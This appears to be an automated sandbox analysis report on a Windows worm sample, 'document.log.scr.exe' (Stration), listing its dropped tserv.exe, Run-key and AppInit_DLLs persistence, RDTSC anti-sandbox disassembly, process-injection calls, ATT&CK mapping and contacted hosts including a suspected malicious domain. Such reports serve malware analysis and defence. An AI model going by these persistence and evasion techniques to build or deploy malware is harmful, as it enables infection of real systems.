Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040EDE00_2_0040EDE0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040DE560_2_0040DE56
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0041C6600_2_0041C660
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004106700_2_00410670
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040E6760_2_0040E676
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00409F470_2_00409F47
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040EF780_2_0040EF78
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040FF300_2_0040FF30
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00405F300_2_00405F30
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: String function: 0042664C appears 45 times
Source: document.log.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal100.evad.winEXE@6/3@12/8
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004047A0 lstrcatA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,0_2_004047A0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00405090 GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcatA,GetFileAttributesA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00405090
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0041E0B0 FindResourceA,LoadResource,SizeofResource,LockResource,CreateFileA,WriteFile,CloseHandle,0_2_0041E0B0
Source: C:\Users\user\Desktop\document.log.scr.exeFile created: C:\Users\user\Desktop\2BF7.tmpJump to behavior
Source: C:\Windows\tserv.exeMutant created: NULL
Source: document.log.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\document.log.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: document.log.scr.exeReversingLabs: Detection: 94%
Source: C:\Users\user\Desktop\document.log.scr.exeFile read: C:\Users\user\Desktop\document.log.scr.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\document.log.scr.exe "C:\Users\user\Desktop\document.log.scr.exe"
Source: C:\Users\user\Desktop\document.log.scr.exeProcess created: C:\Windows\tserv.exe C:\Windows\tserv.exe s
Source: C:\Users\user\Desktop\document.log.scr.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\2BF7.tmp
Source: unknownProcess created: C:\Windows\tserv.exe "C:\Windows\tserv.exe" s
Source: C:\Users\user\Desktop\document.log.scr.exeProcess created: C:\Windows\tserv.exe C:\Windows\tserv.exe sJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\notepad.exe C:\Users\user\Desktop\2BF7.tmpJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeSection loaded: cmut449c14b7.dllJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: cmut449c14b7.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: cmut449c14b7.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: cmut449c14b7.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: cmut449c14b7.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\tserv.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0041F660 LoadLibraryA,GetProcAddress,SetWindowsHookExA,0_2_0041F660
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0042647C push eax; ret 0_2_0042649A
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004254B0 push eax; ret 0_2_004254C4
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004254B0 push eax; ret 0_2_004254EC
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00426687 push ecx; ret 0_2_00426697

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\document.log.scr.exeExecutable created and started: C:\Windows\tserv.exeJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeFile created: C:\Windows\tserv.exeJump to dropped file
Source: C:\Users\user\Desktop\document.log.scr.exeFile created: C:\Windows\tserv.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\tserv.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLsJump to behavior
Source: C:\Windows\tserv.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run tservJump to behavior
Source: C:\Windows\tserv.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run tservJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0041D159 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,0_2_0041D159

Malware Analysis System Evasion

barindex
Source: document.log.scr.exeStatic PE information: Resource name: RT_ICON size: 0xffffff28
Source: C:\Users\user\Desktop\document.log.scr.exeRDTSC instruction interceptor: First address: 40C1E0 second address: 40C1EE instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+04h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [74E5188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F22E4F2F8D5h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dword ptr [esp+08h], eax 0x00000043 rdtsc
Source: C:\Users\user\Desktop\document.log.scr.exeRDTSC instruction interceptor: First address: 40C1EE second address: 40C1FC instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+08h], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [74E5188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F22E4D0F815h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dword ptr [esp+0Ch], eax 0x00000043 rdtsc
Source: C:\Users\user\Desktop\document.log.scr.exeRDTSC instruction interceptor: First address: 40C1FC second address: 40C20A instructions: 0x00000000 rdtsc 0x00000002 xor eax, edx 0x00000004 xor dword ptr [esp+0Ch], eax 0x00000008 call esi 0x0000000a push ecx 0x0000000b call dword ptr [74E5188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F22E4F2F8D5h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov dword ptr [esp+10h], eax 0x00000043 rdtsc
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040C1D0 rdtsc 0_2_0040C1D0
Source: C:\Windows\tserv.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\tserv.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-12752
Source: C:\Users\user\Desktop\document.log.scr.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-12686
Source: C:\Windows\tserv.exe TID: 3192Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Windows\tserv.exe TID: 5600Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Windows\tserv.exeLast function: Thread delayed
Source: C:\Windows\tserv.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00406360 GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,GetLastError,lstrcmpA,lstrcmpA,lstrcmpA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,FindNextFileA,FindClose,0_2_00406360
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00429F44 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_00429F44
Source: C:\Windows\tserv.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\tserv.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-12753
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040C1D0 rdtsc 0_2_0040C1D0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0041F660 LoadLibraryA,GetProcAddress,SetWindowsHookExA,0_2_0041F660
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004210D0 GetProcessHeap,GetProcessHeap,HeapAlloc,RegOpenKeyExA,GetLastError,GetProcessHeap,HeapFree,RegCloseKey,0_2_004210D0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0042731A SetUnhandledExceptionFilter,0_2_0042731A
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0042732E SetUnhandledExceptionFilter,0_2_0042732E

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00404840 OpenProcess,lstrlenA,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,CreateRemoteThread,0_2_00404840
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00423260 GetProcessHeap,HeapAlloc,HeapAlloc,HeapAlloc,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapFree,HeapAlloc,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,InitializeSecurityDescriptor,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,GetTokenInformation,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,AllocateAndInitializeSid,GetLengthSid,AddAce,AllocateAndInitializeSid,GetLengthSid,AddAce,AllocateAndInitializeSid,GetLengthSid,AddAce,IsValidSecurityDescriptor,0_2_00423260
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: GetLocaleInfoA,0_2_0042C8B2
Source: C:\Windows\SysWOW64\notepad.exeQueries volume information: C:\Users\user\Desktop\2BF7.tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00401830 ExpandEnvironmentStringsA,GetLocalTime,CreateFileA,CloseHandle,0_2_00401830
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040BE00 lstrlenA,GetLocalTime,GetTimeZoneInformation,lstrlenA,0_2_0040BE00
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00425D91 EntryPoint,GetVersionExA,GetModuleHandleA,GetModuleHandleA,_fast_error_exit,_fast_error_exit,GetCommandLineA,GetStartupInfoA,__wincmdln,GetModuleHandleA,0_2_00425D91
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Native API
11
Registry Run Keys / Startup Folder
1
Access Token Manipulation
121
Masquerading
OS Credential Dumping2
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
11
Process Injection
121
Virtualization/Sandbox Evasion
LSASS Memory32
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Registry Run Keys / Startup Folder
1
Access Token Manipulation
Security Account Manager121
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
11
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
Obfuscated Files or Information
Cached Domain Credentials124
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546160 Sample: document.log.scr.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 24 yahoo.com 2->24 26 www4.cedesunjerinkas.com 2->26 28 9 other IPs or domains 2->28 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Detected PE file pumping (to bypass AV & sandboxing) 2->42 44 3 other signatures 2->44 7 document.log.scr.exe 3 2->7         started        11 tserv.exe 12 2->11         started        signatures3 process4 dnsIp5 20 C:\Windows\tserv.exe, PE32 7->20 dropped 22 C:\Windows\tserv.exe:Zone.Identifier, ASCII 7->22 dropped 46 Contains functionality to inject threads in other processes 7->46 48 Drops executables to the windows directory (C:\Windows) and starts them 7->48 50 Tries to detect virtualization through RDTSC time measurements 7->50 14 tserv.exe 1 12 7->14         started        18 notepad.exe 7->18         started        30 67.195.204.77, 25 YAHOO-3US United States 11->30 file6 signatures7 process8 dnsIp9 32 mta6.am0.yahoodns.net 98.136.96.75, 25 YAHOO-NE1US United States 14->32 34 mta7.am0.yahoodns.net 98.136.96.77, 25 YAHOO-NE1US United States 14->34 36 5 other IPs or domains 14->36 52 Antivirus detection for dropped file 14->52 54 Multi AV Scanner detection for dropped file 14->54 56 Creates an undocumented autostart registry key 14->56 58 Machine Learning detection for dropped file 14->58 signatures10

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
document.log.scr.exe95%ReversingLabsWin32.Worm.Stration
document.log.scr.exe100%AviraWORM/Stration.C
document.log.scr.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Windows\tserv.exe100%AviraWORM/Stration.C
C:\Windows\tserv.exe100%Joe Sandbox ML
C:\Windows\tserv.exe95%ReversingLabsWin32.Worm.Stration
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
mta6.am0.yahoodns.net
98.136.96.75
truefalse
    unknown
    alt4.gmail-smtp-in.l.google.com
    74.125.200.27
    truefalse
      unknown
      alt3.gmail-smtp-in.l.google.com
      142.251.1.26
      truefalse
        unknown
        mta7.am0.yahoodns.net
        98.136.96.77
        truefalse
          unknown
          gmail-smtp-in.l.google.com
          74.125.206.27
          truefalse
            unknown
            mta5.am0.yahoodns.net
            67.195.228.94
            truefalse
              unknown
              www4.cedesunjerinkas.com
              193.166.255.171
              truefalse
                unknown
                alt2.gmail-smtp-in.l.google.com
                142.251.9.27
                truefalse
                  unknown
                  alt1.gmail-smtp-in.l.google.com
                  142.250.153.26
                  truefalse
                    unknown
                    gmail.com
                    unknown
                    unknownfalse
                      unknown
                      yahoo.com
                      unknown
                      unknownfalse
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        98.136.96.77
                        mta7.am0.yahoodns.netUnited States
                        36646YAHOO-NE1USfalse
                        67.195.228.94
                        mta5.am0.yahoodns.netUnited States
                        36647YAHOO-GQ1USfalse
                        193.166.255.171
                        www4.cedesunjerinkas.comFinland
                        1741FUNETASFIfalse
                        142.250.153.26
                        alt1.gmail-smtp-in.l.google.comUnited States
                        15169GOOGLEUSfalse
                        142.251.9.27
                        alt2.gmail-smtp-in.l.google.comUnited States
                        15169GOOGLEUSfalse
                        142.251.1.26
                        alt3.gmail-smtp-in.l.google.comUnited States
                        15169GOOGLEUSfalse
                        67.195.204.77
                        unknownUnited States
                        26101YAHOO-3USfalse
                        98.136.96.75
                        mta6.am0.yahoodns.netUnited States
                        36646YAHOO-NE1USfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1546160
                        Start date and time:2024-10-31 15:25:17 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:document.log.scr.exe
                        Detection:MAL
                        Classification:mal100.evad.winEXE@6/3@12/8
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 124
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: document.log.scr.exe
                        TimeTypeDescription
                        10:26:28API Interceptor23x Sleep call for process: tserv.exe modified
                        14:26:27AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run tserv C:\Windows\tserv.exe s
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        98.136.96.77Crt09EgZK3.exeGet hashmaliciousTofseeBrowse
                          file.exeGet hashmaliciousPhorpiexBrowse
                            file.exeGet hashmaliciousPhorpiexBrowse
                              file.exeGet hashmaliciousTofseeBrowse
                                3pYA64ZwEC.exeGet hashmaliciousUnknownBrowse
                                  gEkl9O5tiu.exeGet hashmaliciousPhorpiexBrowse
                                    l3Qj8QhTYZ.exeGet hashmaliciousPhorpiexBrowse
                                      file.log.exeGet hashmaliciousUnknownBrowse
                                        message.elm.exeGet hashmaliciousUnknownBrowse
                                          message.txt.exeGet hashmaliciousUnknownBrowse
                                            67.195.228.94fdnoqmpv.exeGet hashmaliciousTofseeBrowse
                                              AvDJi40xp_9fyz7RPmKdbxb4.exeGet hashmaliciousTofseeBrowse
                                                dIg0MWRViP.exeGet hashmaliciousTofseeBrowse
                                                  SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeGet hashmaliciousPhorpiexBrowse
                                                    file.exeGet hashmaliciousPhorpiexBrowse
                                                      WtRLqa6ZXn.exeGet hashmaliciousUnknownBrowse
                                                        newtpp.exeGet hashmaliciousPhorpiexBrowse
                                                          gEkl9O5tiu.exeGet hashmaliciousPhorpiexBrowse
                                                            file.exeGet hashmaliciousTofseeBrowse
                                                              file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                193.166.255.171yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                • www.synetik.net/
                                                                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                • lousta.net/161/343.html
                                                                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                • lousta.net/372/625.html
                                                                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                • lousta.net/766/881.html
                                                                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                • lousta.net/240/311.html
                                                                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                • lousta.net/461/572.html
                                                                djvu452.exeGet hashmaliciousNeconydBrowse
                                                                • lousta.net/775/668.html
                                                                v48ge.exeGet hashmaliciousNeconydBrowse
                                                                • lousta.net/803/179.html
                                                                moviename.exeGet hashmaliciousNeconydBrowse
                                                                • lousta.net/559/617.html
                                                                voltage.exeGet hashmaliciousNeconydBrowse
                                                                • lousta.net/4/805.html
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                mta6.am0.yahoodns.netCrt09EgZK3.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.77
                                                                2IFYYPRUgO.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.228.111
                                                                qkkcfptf.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.74
                                                                vekvtia.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.204.79
                                                                knkduwqg.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.75
                                                                foufdsk.exeGet hashmaliciousTofseeBrowse
                                                                • 98.136.96.76
                                                                UUJycuNA6D.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.204.77
                                                                SGn3RtDC8Y.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.228.106
                                                                .exeGet hashmaliciousUnknownBrowse
                                                                • 98.136.96.76
                                                                Sm4Ty3Em4z.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.204.73
                                                                alt4.gmail-smtp-in.l.google.com4ui8luUSNp.exeGet hashmaliciousCoinhive, XmrigBrowse
                                                                • 74.125.200.26
                                                                rLJ135TPN7.exeGet hashmaliciousUnknownBrowse
                                                                • 142.250.153.27
                                                                gEkl9O5tiu.exeGet hashmaliciousPhorpiexBrowse
                                                                • 173.194.202.27
